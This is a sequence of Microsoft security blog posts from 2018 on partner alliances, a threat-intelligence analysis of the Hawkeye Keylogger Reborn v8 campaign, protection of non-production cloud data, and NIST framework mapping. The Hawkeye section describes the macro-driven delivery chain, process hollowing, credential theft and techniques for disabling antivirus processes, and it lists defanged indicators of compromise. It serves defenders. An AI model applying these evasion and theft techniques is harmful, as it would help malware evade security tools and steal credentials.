Microsoft is excited by the initial reaction to the Microsoft Intelligent Security Association, and we are committed to continuing to build on this early momentum.

Categories: Uncategorized Tags:

How Microsoft 365 Security integrates with the broader security ecosystem—part 1

July 17th, 2018 No comments

Today’s post was coauthored by Debraj Ghosh, Senior Product Marketing Manager, and Diana Kelley, Cybersecurity Field CTO.

This week is the annual Microsoft Inspire conference, where Microsoft directly engages with industry partners. Last year at Inspire, we announced Microsoft 365, providing a solution that enables our partners to help customers drive digital transformation. One of the most important capabilities of Microsoft 365 is securing the modern workplace from the constantly evolving cyberthreat landscape. Microsoft 365 includes information protection, threat protection, identity and access management, and security managementproviding in-depth and holistic security.

Across our Azure, Office 365, and Windows platforms, Microsoft offers a rich set of security tools for the modern workplace. However, the growth and diversity of technological platforms means customers will leverage solutions extending beyond the Microsoft ecosystem of services. While Microsoft 365 Security offers complete coverage for all Microsoft solutions, our customers have asked:

  1. What is Microsofts strategy for integrating into the broader security community?
  2. What services does Microsoft offer to help protect assets extending beyond the Microsoft ecosystem?
  3. Are there real-world examples of Microsoft providing enterprise security for workloads outside of the Microsoft ecosystem and is the integration seamless?

In this series of blogs, well address these topics, beginning with Microsofts strategy for integrating into the broader security ecosystem. Our integration strategy begins with partnerships spanning globally with industry peers, industry alliances, law enforcement, and governments.

Industry peers

Cyberattacks on businesses and governments continue to escalate and our customers must respond more quickly and aggressively to help ensure safety of their data. For many organizations, this means deploying multiple security solutions, which are more effective through seamless information sharing and working jointly as a cohesive solution. To this end, we established the Microsoft Intelligent Security Association. Members of the association work with Microsoft to help ensure solutions have access to more security signals from more sourcesand enhanced from shared threat intelligencehelping customers detect and respond to threats faster.

Figure 1 shows current members of the Microsoft Intelligent Security Association whose solutions complement Microsoft 365 Securitystrengthening the services offered to customers:

Figure 1. Microsoft Intelligent Security Association member organizations.

Industry alliances

Industry alliances are critical for developing guidelines, best practices, and creating a standardization of security requirements. For example, the Fast Identity Online (FIDO) Alliance, helps ensure organizations can provide protection on-premises and in web properties for secure authentication and mobile user credentials. Microsoft is a FIDO board member. Securing identities is a critical part of todays security. FIDO intends to help ensure all who use day-to-day web or on-premises services are provided a standard and exceptional experience for securing their identity.

Microsoft exemplifies a great sign-in experience with Windows Hello, leveraging facial recognition, PIN codes, and fingerprint technologies to power secure authentication for every service and application. FIDO believes the experience is more important than the technology, and Windows Hello is a great experience for everyone as it maintains a secure user sign-in. FIDO is just one example of how Microsoft is taking a leadership position in the security community.

Figure 2 shows FIDOs board member organizations:

Figure 2. FIDO Alliance Board member organizations.

Law enforcement and governments

To help support law enforcement and governments, Microsoft has developed the Digital Crimes Unit (DCU), focused on:

  • Tech support fraud
  • Online Chile exploitation
  • Cloud crime and malware
  • Global strategic enforcement
  • Nation-state actors

The DCU is an international team of attorneys, investigators, data scientists, engineers, analysts, and business professionals working together to transform the fight against cybercrime. Part of the DCU is the Cyber Defense Operations Center, where Microsoft monitors the global threat landscape, staying vigilant to the latest threats.

Figure 3 shows the DCU operations Center:

Figure 3. Microsoft Cyber Defense Operations Center.

Digging deeper

In part 2 of our series, well showcase Microsoft services that enable customers to protect assets and workloads extending beyond the Microsoft ecosystem. Meanwhile, learn more about the depth and breadth of Microsoft 365 Security and start trials of our advanced solutions, which include:

Categories: cybersecurity Tags:

Hawkeye Keylogger – Reborn v8: An in-depth campaign analysis

Much of cybercrime today is fueled by underground markets where malware and cybercriminal services are available for purchase. These markets in the deep web commoditize malware operations. Even novice cybercriminals can buy malware toolkits and other services they might need for malware campaigns: encryption, hosting, antimalware evasion, spamming, and many others.

Hawkeye Keylogger (also known as iSpy Keylogger) is an info-stealing malware thats being sold as malware-as-a-service. Over the years, the malware authors behind Hawkeye have improved the malware service, adding new capabilities and techniques. It was last used in a high-volume campaign in 2016.

This year marked the resurgence of Hawkeye. In April, malware authors started peddling a new version of the malware that they called Hawkeye Keylogger – Reborn v8. Not long after, on April 30, Office 365 Advanced Threat Protection (Office 365 ATP) detected a high-volume campaign that distributed the latest variants of this keylogger.

At the onset, Office 365 ATP blocked the email campaign and protected customers, 52% of whom are in the software and tech sector. Companies in the banking (11%), energy (8%), chemical (5%), and automotive (5%) industries are also among the top targets

Figure 1. Top industries targeted by the April 2018 Hawkeye campaign

Office 365 ATP uses intelligent systems that inspect attachments and links for malicious content to protect customers against threats like Hawkeye in real time. These automated systems include a robust detonation platform, heuristics, and machine learning models. Office 365 ATP uses intelligence from various sensors, including multiple capabilities in Windows Defender Advanced Threat Protection (Windows Defender ATP).

Windows Defender AV (a component of Windows Defender ATP) detected and blocked the malicious attachments used in the campaign in at least 40 countries. United Arab Emirates accounted for 19% of these file encounters, while the Netherlands (15%), the US (11%), South Africa (6%) and the UK (5%) make the rest of the top 5 countries that saw the lure documents used in the campaign. A combination of generic and heuristic protections in Windows Defender AV (TrojanDownloader:O97M/Donoff, Trojan:Win32/Tiggre!rfn, Trojan:Win32/Bluteal!rfn, VirTool:MSIL/NetInject.A) ensured these threats are blocked in customer environments.

Figure 2. Top countries that encountered malicious documents used in the Hawkeye campaign

As part of our job to protect customers from malware attacks, Office 365 ATP researchers monitor malware campaigns like Hawkeye and other developments in the cybercriminal landscape. Our in-depth investigation into malware campaigns like Hawkeye and many others adds to the vast threat intelligence we get from the Microsoft Intelligent Security Graph, which enables us to continuously raise the bar in security. Through the Intelligent Security Graph, security technologies in Microsoft 365 share signals and detections, allowing these technologies to automatically update protection and detection mechanisms, as well as orchestrate remediation across Microsoft 365.

Figure 3. Microsoft 365 threat protection against Hawkeye

Campaign overview

Despite its name, Hawkeye Keylogger – Reborn v8 is more than a common keylogger. Over time, its authors have integrated various modules that provide advanced functionalities like stealth and detection evasion, as well as credential theft and more.

Malware services like Hawkeye are advertised and sold in the deep web, which requires anonymity networks like Tor to access, etc. Interestingly, the Hawkeye authors advertised their malware and even published tutorial videos on a website on the surface web (that has since been taken down). Even more interesting, based on underground forums, it appears the malware authors have employed intermediary resellers, an example of how cybercriminal underground business models expand and evolve.

Our investigation into the April 2018 Hawkeye campaign shows that the cybercriminals have been preparing for the operation since February, when they registered the domains they later used in the campaign.

Typical of malware campaigns, the cybercriminals undertook the following steps:

  • Built malware samples and malware configuration files using a malware builder they acquired from the underground
  • Built weaponized documents to be used a social engineering lure (possibly by using another tool bought in the underground)
  • Packed or obfuscated the samples (using a customized open-source packer)
  • Registered domains for delivery of malware
  • Launched a spam campaign (possibly using a paid spam service) to distribute the malware

Like other malware toolkits, Hawkeye comes with an admin panel that cybercriminals use to monitor and control the attack.

Figure 4: Hawkeyes admin panel

Interestingly, some of the methods used in this Hawkeye campaign are consistent with previous attacks. This suggests that the cybercriminals behind this campaign may be the same group responsible for malware operations that delivered the remote access tool (RAT) Remcos and the info-stealing bot malware Loki. The following methods were used in these campaigns:

  • Multiple documents that create a complicated, multi-stage delivery chain
  • Redirections using shortened bit.ly links
  • Use of malicious macro, VBScript, and PowerShell scripts to run the malware; the Remcos campaign employed an exploit for CVE-2017-0199 but used the same domains
  • Consistent obfuscation technique across multiple samples

Point of entry

In late April, Office 365 ATP analysts spotted a new spam campaign with the subject line RFQ-GHFD456 ADCO 5647 deadline 7th May carrying a Word document attachment named Scan Copy 001.doc. While the attachments file name extension was .doc, it was in fact a malicious Office Open XML format document, which usually uses a .docx file name extension.

In total, the campaign used four different subject lines and five attachments.

Figure 5: Sample emails used in the Hawkeye campaign

Because the attachment contains malicious code, Microsoft Word opens with a security warning. The document uses a common social engineering lure: it displays a fake message and an instruction to Enable editing and Enable content.

Figure 6: The malicious document with social engineering lure

The document contains an embedded frame that connects to a remote location using a shortened URL.

Figure 7: frame in settings.rels.xml on the document

The frame loads an .rtf file from hxxp://bit[.]ly/Loadingwaitplez, which redirects to hxxp://stevemike-fireforce[.]info/work/doc/10.doc.

Figure 8: RTF loaded as a frame inside malicious document

The RTF has an embedded malicious .xlsx file with macro as an OLE object, which in turn contains a stream named PACKAGE that contains the .xlsx contents.

The macro script is mostly obfuscated, but the URL to the malware payload is notably in plaintext.

Figure 9: Obfuscated macro entry point

De-obfuscating the entire script makes its intention clear. The first section uses PowerShell and the System.Net.WebClient object to download the malware to the path C:\Users\Public\svchost32.exe and execute it.

The macro script then terminates both winword.exe and excel.exe. In specific scenarios where Microsoft Word overrides default settings and is running with administrator privileges, the macro can delete Windows Defender AVs malware definitions. It then changes the registry to disable Microsoft Offices security warnings and safety features.

In summary, the campaigns delivery comprises of multiple layers of components that aim to evade detection and possibly complicate analysis by researchers.

Figure 10: The campaigns delivery stages

The downloaded payload, svchost32.exe, is a .NET assembly named Millionare that is obfuscated using a custom version of ConfuserEx, a well-known open-source .NET obfuscator.

Figure 11: Obfuscated .NET assembly Millionare showing some of the scrambled names

The obfuscation modifies the .NET assemblys metadata such that all the class and variable names are non-meaningful and scrambled names in Unicode. This obfuscation causes some analysis tools like .NET Reflector to show some namespaces or classes names as blank, or in some cases, display parts of the code backwards.

Figure 12: .NET Reflector presenting the code backwards due to obfuscation

Finally, the .NET binary loads an unpacked .NET assembly, which includes DLL files embedded as resources in the portable executable (PE).

Figure 13: Loading the unpacked .NET assembly during run-time

Malware loader

The DLL that initiates the malicious behavior is embedded as a resource in the unpacked .NET assembly. It is loaded in memory using process hollowing, a code injection technique that involves spawning a new instance of a legitimate process and then hollowing it out, i.e., replacing the legitimate code with malware.

Figure 14: In-memory unpacking of the malware using process hollowing.

Unlike previous Hawkeye variants (v7), which loaded the main payload into its own process, the new Hawkeye malware injects its code into MSBuild.exe, RegAsm.exe, and VBC.exe, which are signed executables that ship with .NET framework. This is an attempt to masquerade as a legitimate process.

Figure 15: Obfuscated calls using .NET reflection to perform process hollowing injection routine that injects the malwares main payload into RegAsm.exe

Additionally, in the previous version, the process hollowing routine was written in C. In the new version, this routine is completely rewritten as a managed .NET that calls the native Windows API.

Figure 16: Process hollowing routine implemented in .NET using native API function calls

Malware functionalities

The new Hawkeye variants created by the latest version of the malware toolkit have multiple sophisticated functions for information theft and evading detection and analysis.

Information theft

The main keylogger functionality is implemented using hooks that monitor key presses, as well as mouse clicks and window context, along with clipboard hooks and screenshot capability.

It has specific modules for extracting and stealing credentials from the following applications:

  • Beyluxe Messenger
  • Core FTP
  • FileZilla
  • Minecraft (replaced the RuneScape module in previous version)

Like many other malware campaigns, it uses the legitimate BrowserPassView and MailPassView tools to dump credentials from the browser and email client. It also has modules for taking screenshots of the desktop, as well as the webcam, if it exists.

Notably, the malware has a mechanism to visit certain URLs for click-based monetization.

Stealth and anti-analysis

On top of the processes hollowing technique, this malware uses other methods for stealth, including alternate data streams that remove mark of the web (MOTW) from the malwares downloaded files.

This malware can be configured to delay execution by any number of seconds, a technique used mainly to avoid detection by various sandboxes.
It prevents antivirus software from running using an interesting technique. It adds keys to the registry location HKLM\Software\Windows NT\Current Version\Image File Execution Options and sets the Debugger value for certain processes to rundll32.exe, which prevents execution. It targets the following processes related to antivirus and other security software:

  • AvastSvc.exe
  • AvastUI.exe
  • avcenter.exe
  • avconfig.exe
  • avgcsrvx.exe
  • avgidsagent.exe
  • avgnt.exe
  • avgrsx.exe
  • avguard.exe
  • avgui.exe
  • avgwdsvc.exe
  • avp.exe
  • avscan.exe
  • bdagent.exe
  • ccuac.exe
  • ComboFix.exe
  • egui.exe
  • hijackthis.exe
  • instup.exe
  • keyscrambler.exe
  • mbam.exe
  • mbamgui.exe
  • mbampt.exe
  • mbamscheduler.exe
  • mbamservice.exe
  • MpCmdRun.exe
  • MSASCui.exe
  • MsMpEng.exe
  • msseces.exe
  • rstrui.exe
  • spybotsd.exe
  • wireshark.exe
  • zlclient.exe

Further, it blocks access to certain domains that are usually associated with antivirus or security updates. It does this by modifying the HOSTS file. The list of domains to be blocked is determined by the attacker using a config file.

This malware protects its own processes. It blocks the command prompt, registry editor, and task manager. It does this by modifying registry keys for local group policy administrative templates. It also constantly checks active windows and renders action buttons unusable if the window title matches ProcessHacker, Process Explorer, or Taskmgr.

Meanwhile, it prevents other malware from infecting the machine. It repeatedly scans and removes any new values to certain registry keys, stops associated processes, and deletes related files.

Hawkeye attempts to avoid automated analysis. The delay in execution is designed to defeat automated sandbox analysis that allots only a certain time for malware execution and analysis. It likewise attempts to evade manual analysis by monitoring windows and exiting when it finds the following analysis tools:

  • Sandboxie
  • Winsock Packet Editor Pro
  • Wireshark

Defending mailboxes, endpoints, and networks against persistent malware campaigns

Hawkeye illustrates the continuous evolution of malware in a threat landscape fueled by the cybercriminal underground. Malware services make malware accessible to even unsophisticated operators, while simultaneously making malware more durable with advanced techniques like in-memory unpacking and abuse of .NETs CLR engine for stealth. In this blog we covered the capabilities of its latest version, Hawkeye Keylogger – Reborn v8, highlighting some of the enhancements from the previous version. Given its history, Hawkeye is likely to release a new version in the future.

Organizations should continue educating their employees about spotting and preventing social engineering attacks. After all, Hawkeyes complicated infection chain begins with a social engineering email and lure document. A security-aware workforce will go a long way in securing networks against attacks.

More importantly, securing mailboxes, endpoints, and networks using advanced threat protection technologies can prevent attacks like Hawkeye, other malware operations, and sophisticated cyberattacks.

Our in-depth analysis of the latest version and our insight into the cybercriminal operation that drives this development allow us to proactively build robust protections against both known and unknown threats.

Office 365 Advanced Threat Protection (Office 365 ATP) protects mailboxes as well as files, online storage, and applications from malware campaigns like Hawkeye. It uses a robust detonation platform, heuristics, and machine learning to inspect attachments and links for malicious content in real-time, ensuring that emails that carry Hawkeye and other threats dont reach mailboxes and devices. Learn how to add Office 365 ATP to existing Exchange or Office 365 plans.

Windows Defender Antivirus (Windows Defender AV) provides an additional layer of protection by detecting malware delivered through email, as well as other infection vectors. Using local and cloud-based machine learning, Windows Defender AVs next-gen protection can block even new and unknown threats on Windows 10 and Windows 10 in S mode.

Additionally, endpoint detection and response (EDR) capabilities in Windows Defender Advanced Threat Protection (Windows Defender ATP) expose sophisticated and evasive malicious behavior, such as those used by Hawkeye. Sign up for free Windows Defender ATP trial.

Windows Defender ATPs rich detection libraries are powered by machine learning and allows security operations teams to detect and respond to anomalous attacks in the network. For example, machine learning detection algorithms surface the following alert when Hawkeye uses a malicious PowerShell to download the payload:

Figure 16: Windows Defender ATP alert for Hawkeyes malicious PowerShell component

Windows Defender ATP also has behavior-based machine learning algorithms that detect the payload itself:

Figure 17: Windows Defender ATP alert for Hawkeyes payload

These security technologies are part of the advanced threat protection solutions in Microsoft 365. Enhanced signal sharing across services in Windows, Office 365, and Enterprise Mobility + Security through the Microsoft Intelligent Security Graph enables the automatic update of protections and orchestration of remediation across Microsoft 365.

 

 

Office 365 ATP Research

 

 

Indicators of Compromise (Ioc)

Email subject lines

  • {EXT} NEW ORDER ENQUIRY #65563879884210#
  • B/L COPY FOR SHIPMENT
  • Betreff: URGENT ENQ FOR Equipment
  • RFQ-GHFD456 ADCO 5647 deadline 7th May

Attachment file names

  • Betreff URGENT ENQ FOR Equipment.doc
  • BILL OF LADING.doc
  • NEW ORDER ENQUIRY #65563879884210#.doc
  • Scan Copy 001.doc
  • Swift Copy.doc

Domains

  • lokipanelhostingpanel[.]gq
  • stellarball[.]com
  • stemtopx[.]com
  • stevemike-fireforce[.]info

Shortened redirector links

  • hxxp://bit[.]ly/ASD8239ASdmkWi38AS (was also used in a Remcos campaign)
  • hxxp://bit[.l]y/loadingpleaswaitrr
  • hxxp://bit[.l]y/Loadingwaitplez

Files (SHA-256)

  • d97f1248061353b15d460eb1a4740d0d61d3f2fcb41aa86ca6b1d0ff6990210a – .eml
  • 23475b23275e1722f545c4403e4aeddf528426fd242e1e5e17726adb67a494e6 – .eml
  • 02070ca81e0415a8df4b468a6f96298460e8b1ab157a8560dcc120b984ba723b – .eml
  • 79712cc97a19ae7e7e2a4b259e1a098a8dd4bb066d409631fb453b5203c1e9fe – .eml
  • 452cc04c8fc7197d50b2333ecc6111b07827051be75eb4380d9f1811fa94cbc2 – .eml
  • 95511672dce0bd95e882d7c851447f16a3488fd19c380c82a30927bac875672a – .eml
  • 1b778e81ee303688c32117c6663494616cec4db13d0dee7694031d77f0487f39 – .eml
  • 12e9b955d76fd0e769335da2487db2e273e9af55203af5421fc6220f3b1f695e – .eml
  • 12f138e5e511f9c75e14b76e0ee1f3c748e842dfb200ac1bfa43d81058a25a28 – .eml
  • 9dfbd57361c36d5e4bda9d442371fbaa6c32ae0e746ebaf59d4ec34d0c429221 – .docx (stage 1)
  • f1b58fd2bc8695effcabe8df9389eaa8c1f51cf4ec38737e4fbc777874b6e752 – .rtf (stage 2)
  • 5ad6cf87dd42622115f33b53523d0a659308abbbe3b48c7400cc51fd081bf4dd – .doc
  • 7db8d0ff64709d864102c7d29a3803a1099851642374a473e492a3bc2f2a7bae – .rtf
  • 01538c304e4ed77239fc4e31fb14c47604a768a7f9a2a0e7368693255b408420 – .rtf
  • d7ea3b7497f00eec39f8950a7f7cf7c340cf9bf0f8c404e9e677e7bf31ffe7be – .vbs
  • ccce59e6335c8cc6adf973406af1edb7dea5d8ded4a956984dff4ae587bcf0a8 – .exe (packed)
  • c73c58933a027725d42a38e92ad9fd3c9bbb1f8a23b3f97a0dd91e49c38a2a43 – .exe (unpacked)

Categories: cybersecurity Tags:

P = NP: Cloud data protection in vulnerable non-production environments

July 11th, 2018 No comments

Data is the holy grail of your cloud workloads for attackers. Data breaches are the kind of breaches that make the news. With the recent European Union General Data Protection Regulations (GDPR), they will make even bigger headlines. From an enterprise point of view, the most challenging aspect of protecting data is knowing what it is and where it resides. Only when these two questions are answered can you drive data protection via organizational policies.

Most of your sensitive data is collected in production environmentsthe environments you know that you need to protect, and you usually do. But this is only part of the story. Even though best practices mandate that sensitive information be scrubbed before it transits in the organization, this cannot be ensured. It stands in contradiction to the growing adoption and improvements of the shift-left testing concept, as well as other business needs.

Shift-left testing is the movement of testing to earlier stages in the development lifecycle. Mature testing in early stages is appreciated as it helps developers find problems earlier and in a more cost-effective manner. It also helps quality assurance teams to reproduce bugs in the system and accelerates the debugging processes.

There are other business needs for pulling data to non-production environments. In the research and analytics space, data scientists and analysts prefer to use real data to do their research effectively, whether to offer models that improve the production systems, to perform forensic and log analysis, or to bring insight to product, strategy, and marketing teams, to name a few. In the customer service space, helpdesk personnel may need to pull sensitive records to allow them to perform their jobs efficiently.

For these purposes and others, production data is being pulled not only to the staging environment, but also to development and test environments, as well as research and analytics environments. Data may even reach personal or team playgrounds. Oftentimes, the reality is that organizations disperse data across various environments, making it hard to keep track of what and where.

The following schematic depicts the flow of code from development environments to staging and production environments, along with the flow of production data back to staging, development, and research environments to allow for mature testing and business improvement at earlier stages. The latter flow may even continue to leak outside the organizations IT.

From a security point of view, the data pull should be protected, and sensitive data should not be present in a non-production environment. Synthetic fake data generation should be applied when possible, and format-preserving masking should be applied when data needs to be more realistic. However, not using real data will always impose some loss of data properties and, in turn, the data will always lack some characteristics that may be crucial for testing, and certainly for research. Therefore, to enable advanced testing at earlier stages and allow for better analytics, real data will keep being pulled out of production environments, and the associated risk will be spread throughout the organizations data stores.

To address this risk, applying perimeter solutions is a good start. But if this is your answer to the risk, then you should think again! Are you sure that once an attacker gets a hold of your sensitive data, he cannot evade detection? Are you sure that you have no malicious insiders? What is a perimeter in the cloud?

Lets take a step back and rethink the basics of what is needed from a data protection solution: beyond basic security requirements, such as role-based access control, multifactor authentication, setting up firewalls, and encrypting data at rest and data in transit, advanced threat protection should be deployed. This comprises of:

  1. Visibility on where your sensitive data resides, what type of sensitive data it is, and who is accessing this data and how.
  2. Understanding the vulnerabilities of your data stores and being able to fix them.
  3. Detecting the threats and attempts made to infiltrate your data stores.

Any subset of these capabilities is going to leave weak spots in your organizations posture. For instance, if you have visibility regarding the whereabouts of sensitive data, but no knowledge of the vulnerabilities of your databases, can you be sure that any attempt to infiltrate/exfiltrate your database is detected? Test environments are commonly targeted for data breaches where real data is used for testing and development purposes, like the recent example of Shutterfly.

In addition, if you have a vulnerability in a non-production resource, most likely it exists in similar production resources as well. Finding this out gives a great deal of leverage in reconnaissance terms to attackers. They can probe and investigate non-production environments to find weak spots, then apply them to production environments, minimizing their contact with your production environments, and minimizing the probability of being caught by your threat detection solutionsin case the latter is only deployed on your production environments.

This establishes the following imperative: data protection must be an organization-wide solution, not only a production environment deployment! Hence, P = NP.

From a cloud workload protection perspective, you should build a vision of how to protect your data resources that considers your IT, DevOps, and research methodologies, as well as your data stewardship practices. Deriving a roadmap for this vision requires a solution that allows you to discover your organizations data resources, including any resources in your shadow IT infrastructure. The outcome of this methodic processwhether its manual, semi-automated, or fully automatedshould be a mapping of your data estate across all sorts of environments and an associated risk statement with each resource. This evaluation gives you a metric and can be used as a compass to secure your organization. The resources that were deemed eligible for advanced security should then be continuously monitored with advanced threat prevention solutions that keep you alerted with the vulnerabilities of your resources, the sensitivity of your data, and a real-time threat detection capability. Therefore, when we are asked by customers whether they should protect their non-production environments, our answer is: P = NP!

Azure Security Center is a great built-in tool with Azure that can help you protect all your environments. It helps you assess the security state of your cloud resources, both production and non-production environments and provides advanced threat protection against evolving threats. You can start a free trial for Azure and the Security Center, or if youre already using Azure, just open the Security Center blade to start using it today.

Categories: cybersecurity Tags:

Assessing Microsoft 365 security solutions using the NIST Cybersecurity Framework

This blog is part of a series that responds to common questions we receive from customers about deployment of Microsoft 365 security solutions. In this series, youll find context, answers, and guidance for deployment and driving adoption within your organization. Check out our last blogNew FastTrack benefit: Deployment support for Co-management on Windows 10 devices.

Microsoft 365 security solutions align to many cybersecurity protection standards. One widely-adopted standard is the National Institute of Standards and Technology Cybersecurity Framework (NIST CSF). Developed for the US government, NIST CSF is now also used by governments and enterprises worldwide as a best practice for managing cybersecurity risk. Mapping your Microsoft 365 security solutions to NIST CSF can also help you achieve compliance with many certifications and regulations, such as FedRAMP, and others.

Microsoft 365 security solutions are designed to help you empower your users to do their best work securely, from anywhere and with the tools they love. Our security philosophy is built on four pillars: identity and access management, threat protection, information protection, and security management. Microsoft 365 E5 (see Figure 1.) includes products for each pillar that work together to keep your organization safe.

Figure 1.The Microsoft 365 security solutions

At the heart of NIST CSF is the Cybersecurity Framework Core a set of Functions and related outcomes for improving cybersecurity (see Figure 2). In this blog, well show you examples of how you can assess Microsoft 365 security capabilities using the four Function areas in the core: Identify, Protect, Detect and Respond.* Well also provide practical tips on how you can use Microsoft 365 Security to help achieve key outcomes within each function.

Figure 2.The NIST Cybersecurity Framework Core

Identify

Develop the organizational understanding to manage cybersecurity risk to systems, assets, data, and capabilities.

The purpose of this function is to gain a better understanding of your IT environment and identify exactly which assets are at risk of attack. From there, you can start to align these assets and associated risks to your overall business goals (including regulatory and industry requirements) and prioritize which assets require attention.

For example, the Asset management category is about identifying and managing the data, personnel, devices, and systems that enable an organization to achieve its business purpose in a way that is consistent with their relative importance to business objectives and the organizations risk strategy.

Microsoft 365 security solutions help identify and manage key assets such as user identity, company data, PCs and mobile devices, and cloud apps used by company employees. First, provisioning user identities in Microsoft Azure Active Directory (AD) provides fundamental asset and user identity management that includes application access, single sign-on, and device management. Through Azure AD Connect, you can integrate your on-premises directories with Azure Active Directory. (See Figure 3.) This capability allows for a common secure identity for users of Microsoft Office 365, Azure, and thousands of other Software as a Service (SaaS) applications pre-integrated into Azure AD.

Figure 3.Through Azure AD Connect, you can integrate your on-premises directories with Azure Active Directory

Deployment Tip:Start by managing identities in the cloud with Azure AD to get the benefit of single sign-on for all your employees. Azure AD Connect will help you integrate your on-premises directories with Azure Active Directory.

Protect

Develop and implement the appropriate safeguards to ensure delivery of critical infrastructure services.

The Protect function focuses on policies and procedures to protect data from a potential cybersecurity attack.

Microsoft 365 security solutions support NIST CSF related categories in this function. For example, the Identity management and access control category is about managing access to assets by limiting authorization to devices, activities, and transactions. Your first safeguard against threats or attackers is to maintain strict, reliable, and appropriate access control. Azure Active Directory Conditional Access evaluates a set of configurable conditions, including user, device, application, and risk (see Figure 4.) Based on these conditions, you can then set the right level of access control. For access control on your networks.

Figure 4. Azure AD Conditional Access evaluates a set of configurable conditions, including user, device, application, and risk

Deployment Tip:Manage access control by configuring conditional access policies in Azure AD. Use conditional access to apply conditions that grant access depending on a range of factors or conditions, such as location, device compliance, and employee need.

Detect

Develop and implement the appropriate activities to identify the occurrence of a cybersecurity event.

The Detect function covers systems and procedures that help you monitor your environment and detect a security breach as quickly as possible.

Microsoft 365 security solutions provide you with solutions that detect and protect against Anomalies and events in real time. Microsoft 365 security solutions offer advanced threat protection (see Figure 5.), security and audit log management, and application whitelisting to ensure the security and resilience of systems and assets, consistent with related policies, procedures, and agreements. Microsoft 365 has capabilities to detect attacks across these three key attack vectors:

  • Device-based attacksWindows Defender Advanced Threat Protection provides near-instant detection and blocking of new and emerging threats using advanced file and process behavior monitoring and other heuristics. The Alerts queue shows a list of alerts that are flagged from machines in your network.
  • Email-based attacksOffice 365 Advanced Threat Protection protects your emails, attachments, online storage, files, and environment through a variety of technology, including Safe Attachments, Exchange Online Protection, and rich reporting and tracking insights
  • Identity credential attacksAzure Advanced Threat Protection Azure ATP takes information from logs and network events to learn the behavior of users in the organization and build a behavioral profile about them. Then it detects suspicious activities, searching for malicious attacks, abnormal behavior, and security issues and risks.

Figure 5.Threat detection integrated across Microsoft 365

Respond

Response processes and procedures are executed and maintained to ensure timely response to detected cybersecurity events

The Respond Function provides guidelines for effectively containing a cybersecurity incident once it has occurred through development and execution of an effective incident response plan.

Microsoft 365 security solutions directly support the Response Planning category based on a variety of visibility reports and insights. Azure AD Access and Usage reports allow you to view and assess the integrity and security of your organizations implementation of Azure AD. With this information, you can better determine where possible security risks may lie and adequately plan to mitigate those risks. These reports are also used for event Mitigation including anomaly reports, integrated application reports, error reports, user-specific reports, and activity logs that contain a record of all audited events within the last 24 hours, last 7 days, or last 30 days. Supporting the Analysis category, Microsoft offers guidance and education on Windows security and forensics to give organizations the ability to investigate cybercriminal activity and more effectively respond and recover from malware incidents.

Want to Learn More?

For more information and guidance on assessing Microsoft 365 security solutions using the NIST CSF, check out the whitepaper.

Deployment Tip:For more help with Microsoft 365 security, consider FastTrack for Microsoft 365. Whether youre planning your initial Microsoft 365 Security rollout, need to onboard your product, or want to drive end user adoption, FastTrack is your benefit service and is ready to assist you. Get started at FastTrack for Microsoft 365.

* Although Microsoft offers customers some guidance and tools to help with certain the fifth Recover function (data backup, account recovery), Microsoft 365 doesnt specifically address this function. Note also that Microsoft isnt endorsing this NIST framework – there are other standards for cybersecurity protection – but we find it helpful to baseline against commonly used scenarios.


More blog posts from this series:

Categories: Uncategorized Tags: